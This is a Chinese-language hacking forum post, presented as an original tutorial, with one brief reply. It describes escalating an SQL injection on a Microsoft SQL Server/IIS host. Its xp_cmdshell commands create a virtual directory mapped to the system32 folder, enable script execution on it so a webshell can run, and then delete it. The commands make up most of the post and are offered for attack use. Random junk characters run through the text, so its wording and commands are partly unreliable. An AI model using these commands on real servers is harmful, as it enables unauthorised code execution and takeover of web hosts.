返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:7 I/ k! h8 w6 D. j8 x
" O  n8 \8 s( n1 A( J
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'- j; i' o4 V/ \% ]: L5 z6 s
建立虚拟目录win,指向c:\windows\system32. p7 _8 L/ N* U1 ~9 d- @& e
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
% \; ?$ C4 T* K. Y& d1 G8 l9 b让win句有解析asp脚本权限& p: q  A1 [, x$ ?2 ^1 K6 X

, U7 s9 }& |$ d* U+ N& M' Aexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
5 d0 {/ s, W  `7 p4 J4 @8 q删除虚拟目录。- d1 V& X& ?) Q8 U
找不到web绝对路径的一种解决办法,
7 N: T5 M0 C6 \: P, u1 e& u
7 U$ f. e# K) S1 w3 o( T1 w403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表